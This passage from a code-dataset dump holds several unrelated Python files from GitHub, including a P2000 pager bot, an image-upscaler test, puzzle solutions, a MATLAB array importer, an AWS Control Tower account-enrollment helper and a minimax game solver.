capcodes = json.load(file)\n\ndef parse_url_and_clean(city='Amsterdam'):\n\n # url to parse\n url = 'http://p2000.brandweer-berkel-enschot.nl/LiveMonitor.aspx'\n\n ###\n # Get tables from URL, and format into table with columns:\n # Index, Capcode, Datumtijd, Messsage\n # 2,\t2029568,\t30-09-23 23:17:35,\tP 2 BAD-02 Liftopsluiting Binnenkadijk Amsterd...\n\n tables = pd.read_html(url)\n tables[2]\n # select first 10 rows, but skip first row. second row is the header\n df = tables[2][1:]\n # set first row as header\n df.columns = tables[2].iloc[1]\n # drop first row\n df = df.drop(df.index[0])\n\n # get last 6 characters of the last column and set as new column, only if they are digits\n df['incident'] = df['Message'].str[-6:].str.extract('(\\d+)', expand=False)\n\n\n # make new df with only rows that contain 'Amsterdam'\n\n df_amsterdam = df[df['Message'].str.contains(city, case=False)]\n\n if df_amsterdam.empty:\n print(f'No new incidents in {city}')\n send_body_message('🚨🚨🚨🚨🚨🚨🚨')\n time.sleep(0.9)\n send_body_message(f'Geen recente P2000 meldingen in {city}')\n time.sleep(0.9)\n send_body_message('_Einde bericht_')\n exit()\n\n number_of_incidents = 3\n\n # get all messages from the last three incident numbers\n last_three = df_amsterdam[df_amsterdam['incident'].isin(df_amsterdam['incident'].unique()[-number_of_incidents:])]\n\n # merge rows with the same incident number, keeping the capcodes, and first time and message\n last_three = last_three.groupby('incident').agg({'Capcode': lambda x: x.tolist(), 'Datumtijd': 'first', 'Message': 'first'}).reset_index()\n\n # turn the dataframe into a list\n last_three = last_three.values.tolist()\n\n return last_three\n\ndef format_list(last_three, city='Amsterdam'):\n # replace the capcodes with the corresponding names, if they do not exist, replace with 'onbekend'\n for row in last_three:\n row[1] = [capcodes.get(item, '‼️ Code onbekend') for item in row[1]]\n # print the list\n\n\n # turn the list into a formatted string for a telegram bot message\n last_three_formatted = [\n f'{row[2]}: Incident {row[0]}\\n{row[1]}\\n{row[3]}\\n' for row in last_three\n ]\n\n send_body_message('🚨🚨🚨🚨🚨🚨🚨')\n time.sleep(0.9)\n send_body_message(f\"P2000 meldingen\\nRegio {city}\")\n time.sleep(0.9)\n for row in last_three:\n time_only = row[2].split(' ')[1]\n messages = '\\n'.join(row[1])\n # body = f'{time}\\nIncident {row[0]}\\n{row[3]}\\n{messages}\\n'\n body = f'*Tijd*: {time_only}\\n*Bericht*: {row[3]}\\n*Eenheden opgeroepen*\\n{messages}\\n'\n print(body)\n coordinates, label, location_type = get_coordinates_from_string(row[3])\n send_body_message(body)\n time.sleep(1.5)\n send_location_message(coordinates, label, f'Accurracy: {location_type}')\n time.sleep(3)\n send_body_message('_Einde bericht_')\n\n\nif __name__ == '__main__':\n last_three = parse_url_and_clean()\n format_list(last_three)\n\ndef run_p2000_bot(city='Amsterdam'):\n last_three = parse_url_and_clean(city)\n format_list(last_three, city)","repo_name":"kurkmeister/p2000-whatsapp-bot","sub_path":"p2000_bot.py","file_name":"p2000_bot.py","file_ext":"py","file_size_in_byte":3436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"20395044453","text":"import numpy as np\nfrom basicsr.archs.rrdbnet_arch import RRDBNet\n\nfrom realesrgan.utils import RealESRGANer\n\n\ndef test_realesrganer():\n # initialize with default model\n restorer = RealESRGANer(\n scale=4,\n model_path='experiments/pretrained_models/RealESRGAN_x4plus.pth',\n model=None,\n tile=10,\n tile_pad=10,\n pre_pad=2,\n half=False)\n assert isinstance(restorer.model, RRDBNet)\n assert restorer.half is False\n # initialize with user-defined model\n model = RRDBNet(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=6, num_grow_ch=32, scale=4)\n restorer = RealESRGANer(\n scale=4,\n model_path='experiments/pretrained_models/RealESRGAN_x4plus_anime_6B.pth',\n model=model,\n tile=10,\n tile_pad=10,\n pre_pad=2,\n half=True)\n # test attribute\n assert isinstance(restorer.model, RRDBNet)\n assert restorer.half is True\n\n # ------------------ test pre_process ---------------- #\n img = np.random.random((12, 12, 3)).astype(np.float32)\n restorer.pre_process(img)\n assert restorer.img.shape == (1, 3, 14, 14)\n # with modcrop\n restorer.scale = 1\n restorer.pre_process(img)\n assert restorer.img.shape == (1, 3, 16, 16)\n\n # ------------------ test process ---------------- #\n restorer.process()\n assert restorer.output.shape == (1, 3, 64, 64)\n\n # ------------------ test post_process ---------------- #\n restorer.mod_scale = 4\n output = restorer.post_process()\n assert output.shape == (1, 3, 60, 60)\n\n # ------------------ test tile_process ---------------- #\n restorer.scale = 4\n img = np.random.random((12, 12, 3)).astype(np.float32)\n restorer.pre_process(img)\n restorer.tile_process()\n assert restorer.output.shape == (1, 3, 64, 64)\n\n # ------------------ test enhance ---------------- #\n img = np.random.random((12, 12, 3)).astype(np.float32)\n result = restorer.enhance(img, outscale=2)\n assert result[0].shape == (24, 24, 3)\n assert result[1] == 'RGB'\n\n # ------------------ test enhance with 16-bit image---------------- #\n img = np.random.random((4, 4, 3)).astype(np.uint16) + 512\n result = restorer.enhance(img, outscale=2)\n assert result[0].shape == (8, 8, 3)\n assert result[1] == 'RGB'\n\n # ------------------ test enhance with gray image---------------- #\n img = np.random.random((4, 4)).astype(np.float32)\n result = restorer.enhance(img, outscale=2)\n assert result[0].shape == (8, 8)\n assert result[1] == 'L'\n\n # ------------------ test enhance with RGBA---------------- #\n img = np.random.random((4, 4, 4)).astype(np.float32)\n result = restorer.enhance(img, outscale=2)\n assert result[0].shape == (8, 8, 4)\n assert result[1] == 'RGBA'\n\n # ------------------ test enhance with RGBA, alpha_upsampler---------------- #\n restorer.tile_size = 0\n img = np.random.random((4, 4, 4)).astype(np.float32)\n result = restorer.enhance(img, outscale=2, alpha_upsampler=None)\n assert result[0].shape == (8, 8, 4)\n assert result[1] == 'RGBA'\n","repo_name":"xinntao/Real-ESRGAN","sub_path":"tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":3089,"program_lang":"python","lang":"en","doc_type":"code","stars":23737,"dataset":"github-code","pt":"91"} +{"seq_id":"6944867000","text":"import re\nfrom collections import deque\nfrom functools import cache\n\nf = open(\"input.txt\", 'r')\n# f = open(\"test_input.txt\", 'r')\ninput = f.read().splitlines()\ncount_monkeys = 1 + input.count(\"\")\n\nclass NumOps:\n def __init__(self, operation, number) -> None:\n self.operation = operation\n self.number = int(number)\n self.next = None\n self.end = None\n\n def is_divisible(self, divide_by):\n node = self\n mod_result = 0\n while node is not None:\n if node.operation == '+':\n mod_result = (mod_result + (node.number % divide_by)) % divide_by\n elif node.operation == '*':\n mod_result = (mod_result * (node.number % divide_by)) % divide_by\n else:\n mod_result = mod_result ** 2 % divide_by\n node = node.next\n \n return mod_result == 0\n\n def __repr__(self) -> str:\n node = self\n mod_result = 0\n while node is not None:\n if node.operation == '+':\n mod_result = (mod_result + (node.number))\n elif node.operation == '*':\n mod_result = (mod_result * (node.number))\n else:\n mod_result = mod_result ** 2\n node = node.next\n return str(mod_result)\n\n\nclass Monkey:\n def __init__(self) -> None:\n self.items = deque()\n self.operation = None\n self.divisible_by = None\n self.true_throw = None\n self.false_throw = None\n self.inspect_count = 0\n\n def __repr__(self) -> str:\n return \"Monkey with items \" + str(self.items) + \" operations \" + str(self.operation) + \" divisble by \" + str(self.divisible_by) + \" \" + str(self.true_throw) + \" \" + str(self.false_throw) + \" risk \" + str(self.inspect_count)\n\ndef divisible_by(lst, divide_num):\n remainder_total = 0\n for num in lst:\n remainder_total += num % divide_num\n return remainder_total % divide_num == 0\n\nmonkeys = []\ncur_monkey = None\n\nfor line in input:\n if line.find(\"Monkey\") == 0:\n if cur_monkey is not None:\n monkeys.append(cur_monkey)\n cur_monkey = Monkey()\n elif line.strip().find(\"Starting\") == 0:\n for i in line[18:].split(\", \"):\n cur_monkey.items.append(NumOps('+', i))\n elif line.strip().find(\"Operation\") == 0:\n regex = re.compile(\"Operation: new = old ([*+]) ([0-9]+|old)\")\n e = regex.match(line.strip())\n cur_monkey.operation = e.groups()\n elif line.strip().find(\"Test\") == 0:\n regex = re.compile(\"Test: divisible by ([0-9]+)\")\n e = regex.match(line.strip())\n cur_monkey.divisible_by = int(e.group(1))\n elif line.strip().find(\"If true\") == 0:\n regex = re.compile(\"If true: throw to monkey ([0-9]+)\")\n e = regex.match(line.strip())\n cur_monkey.true_throw = int(e.group(1))\n elif line.strip().find(\"If false\") == 0:\n regex = re.compile(\"If false: throw to monkey ([0-9]+)\")\n e = regex.match(line.strip())\n cur_monkey.false_throw = int(e.group(1))\n\nmonkeys.append(cur_monkey)\n\nfor _ in range(10000):\n print(_)\n for monkey in monkeys:\n while len(monkey.items) > 0:\n result = monkey.items.popleft()\n if monkey.operation == ('*', 'old'):\n new_result = NumOps(\"**\", 2)\n else:\n new_result = NumOps(monkey.operation[0], monkey.operation[1])\n if result.end is None:\n result.end = new_result\n result.next = new_result\n else:\n result.end.next = new_result\n result.end = result.end.next\n if result.is_divisible(monkey.divisible_by):\n monkeys[monkey.true_throw].items.append(result)\n else:\n monkeys[monkey.false_throw].items.append(result)\n\n monkey.inspect_count += 1\n\n# print(monkeys)\n\nsorted_result = sorted(monkeys, key=lambda x: x.inspect_count, reverse=True)\n# print(sorted_result)\nprint(sorted_result[0].inspect_count * sorted_result[1].inspect_count)","repo_name":"andylin2004/AOC-2022","sub_path":"Day11/Part2.py","file_name":"Part2.py","file_ext":"py","file_size_in_byte":4092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"25931887679","text":"import sys\n\ndef log(s):\n print(s, file=sys.stderr)\n\nds = [2**29] * 20 + [2**(29-i) for i in range(30)]\n\nnums = []\nn = 1\ni = 0\nwhile i < len(ds):\n m = n + ds[i]\n if m in nums or n in nums:\n n += 1\n continue\n nums += [n, m]\n i += 1\n\nT = int(input())\n\nfor _ in range(T):\n N = int(input())\n print(*nums)\n sys.stdout.flush()\n\n bs = [int(x) for x in input().split()]\n bs = sorted(bs)\n pairs = [(bs[i], bs[i + 1]) for i in range(0, 100, 2)]\n pairs = sorted(pairs, key=lambda x:x[1]-x[0], reverse=True)\n\n bs1 = []\n bs2 = []\n for n1, n2 in pairs:\n if n1 > n2:\n n1, n2 = n2, n1\n if sum(bs1) < sum(bs2):\n bs1 += [n2]\n bs2 += [n1]\n else:\n bs1 += [n1]\n bs2 += [n2]\n\n for i in range(0, 100, 2):\n n1, n2 = nums[i:i+2]\n if n1 > n2:\n n1, n2 = n2, n1\n if sum(bs1) < sum(bs2):\n bs1 += [n2]\n bs2 += [n1]\n else:\n bs1 += [n1]\n bs2 += [n2]\n\n print(*bs1)\n sys.stdout.flush()\n","repo_name":"hirosuzuki/GoogleCodeJam2022","sub_path":"1a/EqualSum.py","file_name":"EqualSum.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"23523309934","text":"\"\"\"Import MATLAB arrays into IDTxl.\n\nModule with functions to import matrices from matfiles (version>7.3, hdf5)\nto IDTxL.\n\nFunctions in this module read the (neurophysiological) data from a Fieldtrip\nfile with the basic fields necessary for the MATLAB version TRENTOOL and create\na numpy array usable as input to TXL.\n\nprovides the functions:\n matarray2idtxlconverter(filename, arrayname, order) = takes a filename,\n the name of the array variable (arrayname) inside,\n and the order of sensor axis, time axisand (CHECK THIS!!)\n repetition axis (as a list)\n\n@author: Michael Wibral\n\"\"\"\n\nimport h5py\nimport numpy as np\n\n\ndef _matarray_2_numpyarray(file_name, array_name, order_list):\n \"\"\"Read Matlab hdf5 file into IDTxl.\n\n reads a matlab hdf5 file (\"-v7.3' or higher, .mat) with a SINGLE\n array inside and returns a numpy array with dimensions that\n are channel x time x trials, using np.swapaxes where necessary\n\n Created on Wed Mar 19 12:34:36 2014\n\n @author: Michael Wibral\n \"\"\"\n print('Converting matlab array from file (v7.3) to numpy array')\n # 1. create a python object that represents the hdf5 file on disk\n mat_file = h5py.File(file_name)\n # assert that at least one of the keys found at the top level\n # of the HDF file matches the name of the array we wanted\n assert array_name in mat_file.keys(), ('array {0} not in mat file or not '\n 'a variable at the top level'\n .format(array_name))\n\n # 2. Create an object for the matlab array (from the hdf5 hierachy)\n the_array = mat_file[array_name][()] # trailing [()] ensures everything is read\n print('From HDF5: ')\n print(the_array)\n # 3. Convert to numpyarray\n the_array = np.asarray(the_array)\n print('as numpy: ')\n print(the_array)\n\n # 4. swapaxes according to the information provided by the user\n the_array = reorder_array(the_array, order_list)\n\n return the_array\n\n\ndef reorder_array(the_array, order_list):\n # put time first as by agrreement in IDTxL\n time_dimension = order_list.index('time')\n if time_dimension != 1:\n the_array = np.swapaxes(the_array, 1, time_dimension)\n # also swap the list to reflect the new arrangement\n order_list[1], order_list[time_dimension] = (\n\t\t\t\t\t\t\t\t\torder_list[time_dimension], order_list[1])\n\n # put channel second\n channel_dimension = order_list.index('channel')\n if channel_dimension != 2:\n the_array = np.swapaxes(the_array, 2, channel_dimension)\n # also swap the list to reflect the new arrangement\n order_list[2], order_list[channel_dimension] = (\n\t\t\t\t\t\t\t\torder_list[channel_dimension], order_list[2])\n\n # put repetitions third - unnecessary in principle as n-1 permutations\n # are guaranteed to sort our array dimensions for n dimensions\n # assert order_list.index('repetition') == 3, print('something went wrong with reordering')\n\n # uncomment the following code when expanding\n # repetition_dimension = order_list.index('repetition')\n # if repetition_dimension !=2:\n # the_array = np.swapaxes(the_array,2,repetition_dimension)\n # # also swap the list to reflect the new arrangement\n # order_list[3], order_list[repetition_dimension] = \\\n # order_list[repetition_dimension], order_list[3]\n\n # put further dimensions fourth in future versions...\n return the_array\n\n\ndef matarray2idtxl(filename, array_name, order_list):\n print('Creating Python dictionary from matlab array: ' + array_name)\n NPData = _matarray_2_numpyarray(filename, array_name, order_list)\n print(NPData)\n label = [None] * NPData.shape[1]\n for n in range(0, NPData.shape[1]):\n label[n] = 'channel{0:04d}.txt'.format(n)\n print(label[n])\n\n NPfsample = 1\n NPtime = np.asarray(range(0, NPData.shape[0])) # take unit time steps\n\n TXLdata = {\n 'np_timeseries': NPData,\n 'label': label,\n 'time': NPtime,\n 'fsample': NPfsample}\n\n return TXLdata\n","repo_name":"pmediano/IDTxl","sub_path":"idtxl/matarray2idtxl.py","file_name":"matarray2idtxl.py","file_ext":"py","file_size_in_byte":4106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"91"} +{"seq_id":"6033793426","text":"import logging\nfrom contextlib import asynccontextmanager\nfrom config import Config\n\nlogger = logging.getLogger(\"uvicorn\")\n\n\n@asynccontextmanager\nasync def lifespan(app):\n on_startup(app)\n yield\n on_shutdown(app)\n\n\ndef on_startup(app):\n logger.info(f\"Documentation can be found at the {app.docs_url} \" f\"or {app.redoc_url} endpoints.\")\n logger.info(\"Using the following queue configuation:\")\n logger.info(f\"Queue name: {Config.QUEUE_NAME}\")\n logger.info(f\"Queue URL: {Config.QUEUE_URL}\")\n\n\ndef on_shutdown(app):\n logger.info(f\"{app.title} has shutdown\")\n","repo_name":"ministryofjustice/laa_govuk_notify_orchestrator","sub_path":"app/lifespan.py","file_name":"lifespan.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"34843518570","text":"import re\nwith open(\"432\", 'r') as f:\n content = f.read()\n\nmatch1 = re.findall(\"Text:(.*)[\\n]\", content)\nmatch2 = re.findall('Type:(.*)[\\n]', content)\nmatch3 = re.findall('Origin:(.*)[\\n]', content)\nmatch4 = re.findall('ID:(.*)[\\n]', content)\nmatch5 = re.findall('Hashtags:(.*)[\\n]', content)\nmatch6 = re.findall('Time:(.*)[\\n]', content)\nmatch7 = re.findall('MentionedEntities:(.*)[\\n]', content)\n#match8 = match1.append(match4)\nfopen = open(\"output.txt\",'w')\nfopen.write(str(match1))\n\n\t\n#print(match1,\"\\n\\n\")\n","repo_name":"AlfredSkaria/Hashtag-recommendation","sub_path":"main project/sample_input/work.py","file_name":"work.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"} +{"seq_id":"22790481307","text":"import boto3, botocore\nimport logging\nimport json\n\n\nclass EnrollAWSAccount:\n def __init__(self, aws_account_id: str, assume_role_name: str):\n self.control_tower_role_name = \"AWSControlTowerExecution\"\n self.control_tower_permissions_policy = \"arn:aws:iam::aws:policy/AdministratorAccess\"\n self.management_account_id = \"\"\n self.aws_account_id = aws_account_id\n self.assume_role_name = assume_role_name\n\n def get_boto_session(self) -> boto3.Session:\n current_aws_account = boto3.client(\"sts\").get_caller_identity()[\"Account\"]\n if current_aws_account == self.aws_account_id:\n return boto3.Session()\n logging.warning(\n f\"Not in correct account, will use {self.assume_role_name} to assume access into {self.aws_account_id}\"\n )\n self.management_account_id = current_aws_account\n return self.assume_role_in_destination_account()\n\n def assume_role_in_destination_account(self) -> boto3.Session:\n sts_client = boto3.client(\"sts\")\n destination_session = sts_client.assume_role(\n RoleArn=f\"arn:aws:iam::{self.aws_account_id}:role/{self.assume_role_name}\",\n RoleSessionName=\"control-tower-enrollment\",\n )\n return boto3.Session(\n aws_access_key_id=destination_session[\"Credentials\"][\"AccessKeyId\"],\n aws_secret_access_key=destination_session[\"Credentials\"][\"SecretAccessKey\"],\n aws_session_token=destination_session[\"Credentials\"][\"SessionToken\"],\n )\n\n def attach_policy(self):\n self.iam_client.attach_role_policy(\n RoleName=self.control_tower_role_name, PolicyArn=self.control_tower_permissions_policy\n )\n\n def get_iam_client(self):\n boto_session = self.get_boto_session()\n return boto_session.client(\"iam\")\n\n def create_role(self, human_supplied_management_account_id: str = \"\"):\n management_account_id = self.management_account_id or human_supplied_management_account_id\n\n self.iam_client = self.get_iam_client()\n\n # https://docs.aws.amazon.com/en_us/controltower/latest/userguide/enroll-manually.html\n try:\n self.iam_client.create_role(\n RoleName=self.control_tower_role_name,\n AssumeRolePolicyDocument=json.dumps(\n {\n \"Version\": \"2012-10-17\",\n \"Statement\": [\n {\n \"Effect\": \"Allow\",\n \"Principal\": {\"AWS\": f\"arn:aws:iam::{management_account_id}:root\"},\n \"Action\": \"sts:AssumeRole\",\n \"Condition\": {},\n }\n ],\n }\n ),\n )\n except self.iam_client.exceptions.ClientError as ex:\n if ex.response[\"Error\"][\"Code\"] == \"EntityAlreadyExistsException\":\n logging.warning(\"Role Already created\")\n\n logging.info(f\"Attaching Policy to Role\")\n self.attach_policy()\n","repo_name":"keit-labs/control-tower-helpers","sub_path":"modules/enroll.py","file_name":"enroll.py","file_ext":"py","file_size_in_byte":3108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"8988352226","text":"# List initialization \nlist_string = ['21', '1', '131', '12', '15'] \n \n# mapping \nlist_map = map(int, list_string) \n \n# sorting list \nlist_sorted = sorted(list_map) \n \n# Printing sorted list of integers \nprint(list_sorted) ","repo_name":"AjayYadavAi/python-programs","sub_path":"new_cchek.py","file_name":"new_cchek.py","file_ext":"py","file_size_in_byte":226,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"90"} +{"seq_id":"22199154731","text":"class Mat:\n def __init__ (self,a,b,c,d):\n self.a = a\n self.b = b\n self.c = c\n self.d = d\n\n def p (self,y):\n return Mat(self.a + y.a, self.b + y.b, self.c + y.c, self.d + y.d)\n \n def m (self,y):\n return Mat(self.a - y.a, self.b - y.b, self.c - y.c, self.d - y.d)\n \n def mult (self,const):\n return Mat(self.a * const, self.b * const, self.c * const, self.d * const)\n \n def Mult (self, mat):\n q = self.a * mat.a + self.b * mat.c\n w = self.a * mat.b + self.b * mat.d\n e = self.c * mat.a + self.d * mat.c\n r = self.c * mat.b + self.d * mat.d\n return Mat(q,w,e,r)\n \n def pr(x):\n print(x.a,x.b)\n print(x.c,x.d)\n \n def T(x):\n x.b += x.c\n x.c = x.b - x.c\n x.b = x.b - x.c\n def det(a):\n return a.a * a.d - a.c * a.b\n \nx = Mat(1,0,0,1)\ny = Mat(7,7,3,7)\nz =x.p(y)\nz.T()\nz=z.mult(10)\nz.pr()\nz=z.Mult(x)\nz.pr()\nz=z.Mult(z)\nz.pr()\nz.T()\nz.pr()\nz.T()\nz.pr()\nprint(z.det())\nprint((z.Mult(z)).det())\n","repo_name":"AlekseevYuri/13-605","sub_path":"sem1/mat_2_r.py","file_name":"mat_2_r.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"90"} +{"seq_id":"10505864766","text":"import sys\nimport copy\nimport numpy as np\nimport time\nfrom datetime import datetime\nimport copy\n\n\ndef applyGravity(gridArray):\n for j in range(0, sizeOfGrid):\n copyArray = gridArray[:, j]\n for k in range(0, sizeOfGrid):\n if (copyArray[k] == '*'):\n copyArray = np.delete(copyArray, k)\n copyArray = np.insert(copyArray, 0, '*')\n gridArray[:, j] = copyArray\n return gridArray\n\n\ndef isInBound(x, y):\n if (x >= 0 and y >= 0 and x < sizeOfGrid and y < sizeOfGrid):\n return True\n return False\n\n\ndef checkRegions(x, y, grid, number, dontGo, region, gridCheck):\n if (isInBound(x, y)):\n if (gridCheck[x][y] == False):\n if (grid[x][y] == number):\n region.append((x, y))\n gridCheck[x][y] = True\n if (dontGo != 'u'):\n checkRegions(x - 1, y, grid, number, 'd', region, gridCheck)\n if (dontGo != 'd'):\n checkRegions(x + 1, y, grid, number, 'u', region, gridCheck)\n if (dontGo != 'r'):\n checkRegions(x, y + 1, grid, number, 'l', region, gridCheck)\n if (dontGo != 'l'):\n checkRegions(x, y - 1, grid, number, 'r', region, gridCheck)\n\n\ndef popRegion(gridSent, region):\n grid = gridSent.copy()\n for j, k in region:\n grid[j][k] = '*'\n applyGravity(grid)\n return grid\n\n\nclass Node:\n gridArray = []\n children = []\n myScore = 0\n opScore = 0\n starCount = 0\n\n def __init__(self, gridPassed, stars, myScorePassed=0, opScorePassed=0, popped=None):\n self.gridArray = gridPassed.copy()\n self.children = []\n self.myScore = myScorePassed\n self.opScore = opScorePassed\n self.value = 0\n self.starCount = stars\n self.popped = popped\n self.calledFunction = 0\n\n\ndef alphaBetaMax(node, alpha, beta, depthLimit):\n #alphaBetaMax.counter = alphaBetaMax.counter + 1\n if depthLimit < 0 or node.starCount >= maximumStars:\n node.value = node.myScore - node.opScore\n else:\n node.value = - sys.maxsize\n regions = []\n gridCheck = np.zeros((sizeOfGrid, sizeOfGrid), dtype=bool)\n for i in range(0, sizeOfGrid):\n for j in range(0, sizeOfGrid):\n # If not already part of a region.\n if (gridCheck[i][j] == False):\n\n # Make part of region\n gridCheck[i][j] = True\n\n # Check if element is '*', if yes, skip.\n if (node.gridArray[i][j] != '*'):\n # Create a new region and add this index to it.\n region = []\n region.append((i, j))\n\n # Get the fruit at that location.\n fruit = node.gridArray[i][j]\n\n # Check for an existing region for this fruit on the right.\n checkRegions(i, j + 1, node.gridArray, fruit, 'l', region, gridCheck)\n # Check for an existing region for this fruit below.\n checkRegions(i + 1, j, node.gridArray, fruit, 'u', region, gridCheck)\n\n # Add this newly detected region into the list of regions for this node.\n regions.append(region)\n sortRegions(regions)\n for region in regions:\n\n # Update the score to the right measure if this region is popped.\n myScore = node.myScore\n opScore = node.opScore\n\n gridChild = copy.deepcopy(popRegion(node.gridArray, region))\n\n myScore = myScore + np.square(region.__len__())\n stars = node.starCount + region.__len__()\n\n # Create a new child node and add it to the children of this node.\n childNode = Node(gridChild, stars, myScore, opScore, (chr(64 + 1 + region[0][1]), region[0][0] + 1))\n\n node.value = max(node.value, alphaBetaMin(childNode, alpha, beta, depthLimit - 1))\n node.calledFunction += 1\n if (node.value >= beta):\n return node.value\n alpha = max(alpha, node.value)\n\n node.children.append(childNode)\n\n # Terminal Test\n if (regions.__len__() == 0):\n node.value = node.myScore - node.opScore\n\n return node.value\n\n\ndef alphaBetaMin(node, alpha, beta, depthLimit):\n #alphaBetaMin.counter = alphaBetaMin.counter + 1\n if depthLimit < 0 or node.starCount == maximumStars:\n node.value = node.myScore - node.opScore\n else:\n node.value = sys.maxsize\n count = 0\n regions = []\n # ti1 = datetime.now()\n\n gridCheck = np.zeros((sizeOfGrid, sizeOfGrid), dtype=bool)\n for i in range(0, sizeOfGrid):\n for j in range(0, sizeOfGrid):\n # If not already part of a region.\n if (gridCheck[i][j] == False):\n\n # Make part of region\n gridCheck[i][j] = True\n\n # Check if element is '*', if yes, skip.\n if (node.gridArray[i][j] != '*'):\n # Create a new region and add this index to it.\n region = []\n region.append((i, j))\n\n # Get the fruit at that location.\n fruit = node.gridArray[i][j]\n\n # Check for an existing region for this fruit on the right.\n checkRegions(i, j + 1, node.gridArray, fruit, 'l', region, gridCheck)\n # Check for an existing region for this fruit below.\n checkRegions(i + 1, j, node.gridArray, fruit, 'u', region, gridCheck)\n\n # Add this newly detected region into the list of regions for this node.\n regions.append(region)\n sortRegions(regions)\n for region in regions:\n # Update the score to the right measure if this region is popped.\n myScore = node.myScore\n opScore = node.opScore\n\n gridChild = popRegion(node.gridArray, region)\n\n opScore = opScore + np.square(region.__len__())\n\n stars = node.starCount + region.__len__()\n\n count += 1\n\n # Create a new child node and add it to the children of this node.\n childNode = Node(gridChild, stars, myScore, opScore, (chr(64 + 1 + j), i + 1))\n node.value = min(node.value, alphaBetaMax(childNode, alpha, beta, depthLimit - 1))\n node.calledFunction += 1\n\n if (node.value <= alpha):\n return node.value\n beta = min(beta, node.value)\n\n node.children.append(childNode)\n # ti2 = datetime.now()\n\n # print('Time for generating ', count,' children: ', ti2-ti1,' at depth ', depthLimit)\n\n # Terminal Test\n if (regions.__len__() == 0):\n node.value = node.myScore - node.opScore\n\n return node.value\n\n\ndef sortRegions(listToSort):\n if len(listToSort) > 1:\n centerIndex = len(listToSort) // 2\n regionsLeft = listToSort[:centerIndex]\n regionsRight = listToSort[centerIndex:]\n\n sortRegions(regionsLeft)\n sortRegions(regionsRight)\n\n one = 0\n two = 0\n three = 0\n while one < len(regionsLeft) and two < len(regionsRight):\n if regionsLeft[one].__len__() > regionsRight[two].__len__():\n listToSort[three] = regionsLeft[one]\n one = one + 1\n else:\n listToSort[three] = regionsRight[two]\n two = two + 1\n three = three + 1\n\n while one < len(regionsLeft):\n listToSort[three] = regionsLeft[one]\n one = one + 1\n three = three + 1\n\n while two < len(regionsRight):\n listToSort[three] = regionsRight[two]\n two = two + 1\n three = three + 1\n\n\n\n\n# Start reading from file\nfileVar = open('input.txt', 'r')\nalphaBetaMin.counter = 0\nalphaBetaMax.counter = 0\ndepth = 1\n\nsizeOfGrid = int(fileVar.readline())\nprint(sizeOfGrid)\ntypesOfFruit = int(fileVar.readline())\nprint(typesOfFruit)\ntimeToRun = (fileVar.readline())\nprint(timeToRun)\ngrid = []\nif float(timeToRun) < 60:\n depth = 0\nelif(sizeOfGrid<=7 and float(timeToRun) > 150):\n depth =3\nelif sizeOfGrid >= 10 and float(timeToRun) < 150:\n depth = 0\n\nprint('Depth: ', depth)\nfor j in range(0, sizeOfGrid):\n grid.append(list(fileVar.readline())[:sizeOfGrid])\n\ngrid = np.array(grid)\ngridCheck = np.full((sizeOfGrid, sizeOfGrid), False, dtype=bool)\n# print(grid)\n\n# Start detecting regions\nregions = []\n\nt1 = datetime.now()\nstars = 0\nfor i in range(0, sizeOfGrid):\n for j in range(0, sizeOfGrid):\n # print((i,j))\n if grid[i][j] == '*':\n stars = stars + 1\n\nmaximumStars = np.square(sizeOfGrid)\nnode = Node(grid, stars)\n\nfinalValue = alphaBetaMax(node, -sys.maxsize, sys.maxsize, depth)\n\nselectedMove = None\nfor i in range(0, node.children.__len__()):\n if (node.children[i].value == finalValue):\n selectedMove = node.children[i]\n break\n#if selectedMove != None:\n# print(selectedMove.gridArray)\nt2 = datetime.now()\n\nprint(t2 - t1)\n\ntotalCount = alphaBetaMin.counter + alphaBetaMax.counter\nprint(totalCount)\nprint('Outputting.')\noutput = open('output.txt', 'w')\noutput.write(selectedMove.popped[0] + selectedMove.popped[1].__str__() + '\\n')\nfor s in range(0, sizeOfGrid):\n for p in range(0, sizeOfGrid):\n output.write(selectedMove.gridArray[s][p])\n output.write('\\n')\noutput.close()\n","repo_name":"itstaby/Minimax-Fruit-Rage","sub_path":"homework3.py","file_name":"homework3.py","file_ext":"py","file_size_in_byte":9672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"18583770679","text":"import sys\ninput = lambda: sys.stdin.readline().rstrip()\n\ndef main():\n a, b, c, d = map(int, input().split())\n left = a + b\n right = c + d\n if left > right:\n print('Left')\n elif left < right:\n print('Right')\n else:\n print('Balanced')\n\nif __name__ == '__main__':\n main()","repo_name":"Aasthaengg/IBMdataset","sub_path":"Python_codes/p03477/s781309668.py","file_name":"s781309668.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"42929785145","text":"from tkinter import *\nfrom apps.api_covid import Apis\nfrom apps.frames_app import send_frame_infecteds, send_frame_recovereds, send_frame_deads\n\n#######colors\nc0 = \"#000000\" # black\nc1 = \"#cc1d4e\" # red\nc2 = \"#feffff\" # white\nc3 = \"#0074eb\" # blue\nc4 = \"#435e5a\" # #435e5a\nc5 = \"#59b356\" # green\nc6 = \"#d9d9d9\" # grey\n#######\n\nclass Window(QMainWindow):\n \n def __init__(self):\n super().__init__()\n \n window = Tk()\n window.title('')\n window.resizable(width=FALSE, height=FALSE)\n window.geometry('835x360')\n window.configure(background=c6)\n\n def get_frames(self):\n #red division frame\n app_cov_frame= Frame(window, width=840, height=50, background=c1, relief=\"flat\")\n 